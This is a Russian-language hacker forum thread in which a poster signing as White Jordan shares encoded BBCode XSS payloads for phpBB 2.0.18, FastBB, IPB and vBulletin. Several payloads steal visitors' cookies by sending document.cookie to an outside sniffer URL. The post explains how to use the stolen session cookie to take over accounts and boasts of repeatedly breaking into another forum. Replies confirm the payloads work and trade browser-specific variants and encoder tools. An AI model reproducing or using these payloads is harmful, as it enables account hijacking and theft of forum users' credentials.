![]() |
Kak lomati phpbb 2.0.18 i nizhe. Koroche na vseh forymah deistvyet.
Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.
Ny potratil nesoliko secund, koroche lovite kod alerta: Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]http://webmastertools.narod.ru/Onlin...rl_decode.html Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati. Sniffak delaetsya ispolizyya ety ssiulky: http://www.h4cky0u.org/encrypt/index.php Ny i komy interesno, chitaite ety statiiu dlya profilaktiki http://forum.antichat.ru/thread10119.html Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata. Alert. Код HTML:
[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]Код HTML:
[font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo. Viuschla novaya versiya IPB 2.1.3 I lomaetsya eta versiya vot tak: (Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. ) Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javaSCrip t:alert(/wj/))`Kyki voryem vot tak: Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7) Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal. Sniffer. Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]Kstati, eto yzhe k wapbbs. Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. ) A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool White Jordan. |
Отлично! А это работает на Vbuletin 350?
|
Цитата:
а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему. |
Цитата:
|
в Ipb 2.0.4 всё проходит , просто супер.
|
Цитата:
xss и СИ он знал отлично. а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате. но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально. |
Цитата:
|
WJ Конечно молодец не чё не скажешь!
Но все его XSS коды работают тока в IE. Но ведь есть FireFoX Opera/ Коды в студию =) |
Цитата:
нет лол конечно можно сделать так, чтобы работало и в Опере и в Фаерфоксе, но просто как то саму разумеется выкладывается для Ие, а потом читатель дописывает код для той версии браузера, которая ему нужна. Ты вообще знаешь СКОЛЬКО в мире разных браузеров??? Не могу же Я дописывать для каждого браузера коды! Это просто дело времени да и не нужно. Есть много способов сделать чтобы коды работали в фаерфоксе кстати. Одна из них, эот использовать функцию onmouseover=alert(/wj/) ну и размер увеличить до такой велечены, чтобы хочешь не хочешь а хер....да много способов есть! Сам фаерфокс и опера, имеют меньше возможностей чем ИЕ это раз, так что Javascript без тегов и многое другое, не работает ни в фаерфоксе ни в опере. ИЕ это вообще самый лучшый браузер в мире, но он менее из-за этого защищён. Я та тут причём |
Цитата:
|
Ха как интересно, просто столько слухов шло, что коды в статье не работали, проверив, Я нашёл что они и действительно не работают.
Хер знает почему, но видео которое Я снял, короче туда Я поместил уже рабочий код. Это видео будет ещё несколько дней там висеть потом оно само сотрётся. А вообще хорошо, что в статье код не работает даже когда плюсики убераешь.... ломать не будут. |
мх, да нет, всё работает вродебы...+document.cookie не забудьте правильно написать и тогда всё работает.
|
хм... специальными символами здесь будут только " (& + # 3 4 ; )? т.е. + убирается только в них?
|
Подскажите, а что нам даёт код алерта?
|
Цитата:
NeMiNeM, Показывает что всё работает. Если есть алёрт, будет всё остальное. И сниффер, и любой другой язык Javascript`а если сумеешь правильно всё написать. |
Все прекрасно работает. Огромнейшее спасибо автору. Однако хотелось бы выяснить, есть ли подобные XSS для vb 3.5.x?
|
Цитата:
Ну у меня конечно есть. А в публику это Я выкладывать не хочу, так как это самый защищённый форум на сегодняшний день, (Я проверил) и хотелось бы на всякий пожарный, уметь его иметь. +) NeMiNeM, Сонный был, чуток не правильно сказал прочёл так сам засмеялся лол... Алёрт показывает что всё работает. Если есть алёрт, будет всё остальное, и сниффер, и любая другая функция Javascript`а если с умеешь правильно всё написать обойдя все фильтры. Вот так надо. +) |
Цитата:
2WJ Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания. |
Цитата:
Теперь, многие твои идеи Я уже улучшил и постоянно улучшаю. К примеру, уже спаренные теги, Код HTML:
[COLOR=[IMG]http://www.wj.gif[/IMG]]wj[/COLOR]Код HTML:
[email]wj@wj.com[url]http://www.wj.com[/url][/email]Я теперь использую тройные, а часто четверные комбинации тегов. Вот это уже извини подвинься, придумал именно Я. =) Цитата:
Цитата:
Цитата:
Цитата:
По всем доказательствам ты был первым, который это всё нашёл хотя не спорю, что это могли знать и другие люди, и ты мог быть не первым....ну во всяком случаи ты был первым, который вывел мир из тьмы незнания. ) Опять таки Я взял всю эту информацию и усовершенствовал её. Я теперь могу воровать куки во всех браузерах и делать это так, чтобы человек этого не заметил. Вот это тоже нашёл Я. Античат был базой и есть база, вот так скажу........античатовская школа, инфлуировала много-численное количество людей. Но никто не стоит на месте. :cool: |
Джордан, а твой способ будет совершенно бесполезен если админ просто-напросто не поставит галочку "запомнить" при входе...На сниффер придут куки без хэша. Только сессия и id юзера.
|
Цитата:
|
Всем привет!
Попробовал коды WJ локально (Денвер+phpBB 2.0.18), все работает. На реальном же форуме (club.passion.ru) почему-то не пашет. Весь код после вставки появляется в сообщении, только спецсимволы на нормальные заменяются. В чем тут может быть дело? |
Хочу переделать сниффер под себя, но к сожелению http://www.h4cky0u.org/encrypt/index.php у меня не работает! Кто знает где ещё есть такие декодеры или у кого откривается ета страница?
Edit: уже не нужно - нашёл! Кому надо: http://www.christ4you.org/modules/xo...unc=URLENCODER |
а можно сделать так, чтобы в алерте мой текст был ?
|
Цитата:
|
Цитата:
|
Цитата:
Только сейчас на античате тег фонт - просто отфильтруется. Не знаю сделано ли это чтобы показать, что никакого взлома не было, лoл, но по крайней мере свои атрибуты в теге фонт до сего дня можно вписывать. в теге фонт, теперь не пропускается кодировка UTF-8, слеши и скобки. А так, все до сих пор - работает. |
| Время: 02:35 |